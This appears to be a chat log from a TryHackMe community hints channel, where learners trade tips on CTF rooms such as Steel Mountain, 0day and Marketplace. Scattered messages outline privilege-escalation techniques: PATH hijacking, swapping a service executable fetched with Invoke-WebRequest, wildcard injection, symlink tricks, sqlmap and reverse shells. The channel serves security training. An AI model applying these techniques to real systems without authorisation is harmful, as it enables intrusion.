@dawn tundra yup
Thanks @echo salmon my thinking is ||as the full path to tar has not been specified, I place a malicious file in its path to be executed, is that right? If so, I'm struggling to have it honour my custom path||
@dawn tundra check dm
I have a problem in Upload Vulnerabilities room Task 11 "Challenge"
Simply, gobuster doesn't work. I didn't have any problems with any of the previous tasks, just the Challenge - has anyone had a similar problem?
My comrades....
I'm doing the CC:Pentesting room and I'm in the sql map part
I use sqlmap -u "10.10.94.111" --forms and it runs an exploit but I don't get anything like the name of the DB or how many columns and so on
What am I supposed to be doing here?
@torn leaf there is a walkthrough video linked in the task
and you have one l too many in the command
it's uploadvulns not uploadvulnls
Oh... It would take me a while to notice that, thanks 😄
@cosmic phoenix check sqlmap --help for dumping database
👍
hey, i really need help on https://tryhackme.com/room/steelmountain, i'm totally lost on the privilege escalation..
find a script to enumerate everything and find a flaw
already done that
did you use winpeas @alpine lantern?
no
give it a go and then try checking this section ||[*] Checking service executable and argument permissions...||
|| i know that i need to change the path to the service with a .exe named ASCService.exe but i just can't upload it ||
sorry, that's not the name of the section in winpeas, reading my notes properly I see I actually used ||PowerUp.ps1 from PowerSploit||. Same info is in winpeas though
i already use it
ahh, ok, so you're already there
just use Invoke-WebRequest to grab it from a python SimpleHTTPServer on your attackbox, ||upload it into c:\windows\temp\ first, stop the service and then copy it into place||
you said you had a new malicious service file called ACService.exe but you "just can't upload it"
can any one give me a hint after this
in @proven bridge room https://tryhackme.com/room/0day
have you stopped the service?
upload to a different directory first, stop the service, copy it across with cp in meterpreter
don't think we're allowed hint for 72 hours on a new box @timid sequoia
Hi !! Can you help me with 0day? I got the first flag. I'm trying to get root. I think I found the exploit but I don't know how to transfer and execute it on the server ...
@median compass i didnt know that
no spoilers @white salmon, still a new box
Oh yeah sorry ..
I am doing Psycho room and got stuck, i have got ssh credentials but they are not working, any help is appreciated
What’s the error message you get when you try to login to ssh?
I got the whole line where left is username and right is password, but I am trying various combinations and it's still not accepting. I think there is some formatting issue or mistake I am making.
it's like this blacklistpasswordiszero, I am using blacklist and password zero or iszero
done thanks @median compass
happy hunting
yo
for marketplace #3, ||to login as michael, i tried to overwrite backup.sh with backup.tar via symlink, || but got Cannot open: Permission denied. the file permission is ok. what's wrong here? am i on the right track?
Anyone on Marketplace, I am on the cracking part of the hashes, I have tried hashcat, John and kraken but no luck.
I just finished Marketplace, ama (dm)
@storm quiver If it's not in rockyou or takes more than 5 minutes or so, you're not meant to crack it
@pine ermine I will dm
sure! but @stuck fractal gave the right direction
@stuck fractal thanks
@wicked rain lookup ||wildcard injection||
can i pm u on marketplace? @pine ermine
Yes, shoot
@white salmon Check the ||$PATH||
@timid sequoia If you haven't already figured it out. Use ||Nikto||
That should help a bit 😉
Awesome, great work!
Room completed thx !
@proven bridge can i send you a PM about the root part? I rooted the box but i don't know if it's the intended path.
Hello, anyone available for a question?
I'm in my first room (vulnversity) and on step #4 of Compromise the webserver I can
[...] can't connect to myself using the reverse shell
That's quite vague
Connection timed out (110)
What IP did you use?
the one I found when I go to http://10.10.10.10
which is the same under cmd -> ipconfig
You need to allow it through the firewall
I think I have
I don't think you have.
You will find it much easier to use Linux for this, particularly Kali.
Create a virtual machine
Run the VPN directly in the VM
Im very unfamiliar with kali, but I tried doing them on my raspbian, but the tools needed are a little too 'advanced' for that
Yeah, unfamiliar with Linux too 😄
Alright, I'll do that
I'll first try to finish this one in Windows
I'll let you know how it goes, thanks very much for your help so far
Good luck.
You were right, firewall stopped it 😒
@red minnow any chance i can message you about this 0day room i been at it for like 12 hours still kinda confused
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.
@dWh2 The hint given by the room creator is a good one and the privilege escalation is easy to see. At the moment i can't help you, there are rules to follow 😄
what rule ??
no hints for 72 hours since the room has been released
use the search bar @quaint star for the hint that 0day gave to AlienOne
oh okay. i saw it says 48 days so i didnt know
Check #announcements
yeah i saw the ||$PATH|| but was confused
did you read the full post, cause that's not the hint he gave to AlienOne
oh so roughly like 4.5 hours left ? @stuck fractal
ah okay, i'll have a look thanks @median compass
happy hunting
oh right yeah i have used that and found many, as i said i've been at this for 12+hours lol
tried many also all to no avail
No, like 26 hours left
I made the same mistake. The date on the tryhackme webpage is probably when it was uploaded but not released.
my issue is not with user just root sadly
It's when the room was created
Not related to uploads @visual burrow
It's usually reset but Skidy was away
are you a mod here btw ninja
ffs @quaint star, would it not have been easier to start with that?
@quaint star Check my roles
yeah so sorry @median compass
uh im new to discord sorry ninja not sure what that is
on the right i dont see you on mods
Because I'm offline.
I'm invisible. Because people keep DMing me if I go online.
AI at its finest
Btw..marketplace what a stunner.
I love the platform here at tryhackme, subscriber for life btw.
yup so great, such a great community too and the moderators seem to be so active
we're an afterthought 
ughhhhh
easy ctf is making me cry
I feel like I am missing something, I was able to find MULTIPLE vulnerabilities based on the versions of the apps running, but they are asking for a specific one... any hints on what I should be running to find out exactly which exploit to run
You mean simple ctf room?
Yup, simple ctf.
easyctf is the room code
ok... semantics here
anyway
any hints haha
I will use room title instead of code from now on.
I found stuff for OpenSSH and Apache versions, nothing for vsftpd
Got a hint, missed a step...
brute force the apache server to find directories
yea i did that just now, that was the step i missed lol
I got too focused on doing the nmap scan and looking at version exploits right away
usually you won't find a vulnerable SSH or FTP protocol, so searching for vulnerabilities for these services should be the last thing you do if you can't find something else.
I gotcha, I did find stuff for apache 2.4.18 and openSSH 7.2p which threw me off a bit XD
Is there another typical name for the private key than "id_rsa" that is one char longer?
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
In Networking services exploiting telnet(task7) #5 they state to use “sudo tcpdump ip proto\icmp -i tunO” . I have tried on different Kali machines and always get no such device. Can someone explain what is wrong?
tun0 is the VPN adapter
If you're using your own kali machine, make sure you're connected to the VPN directly from the VM
If you're using THM's Kali/AttackBox, use the appropriate adapter there.
Hi all again, anyone in here already solved the CSP task 7? I am going nuts 😫
haha 0day pwned
